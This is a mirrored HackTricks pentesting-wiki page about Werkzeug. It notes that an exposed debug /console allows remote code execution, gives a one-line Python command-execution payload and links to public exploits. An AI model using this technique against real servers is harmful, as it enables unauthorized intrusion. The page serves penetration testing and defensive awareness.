mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-06 10:18:55 +00:00
14 lines
322 B
Markdown
14 lines
322 B
Markdown
# werkzeug
|
|
|
|
If debug is active you could try to access to `/console` and gain RCE.
|
|
|
|
```python
|
|
__import__('os').popen('whoami').read();
|
|
```
|
|
|
|
|
|
|
|
There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.
|
|
|
|
|
|
|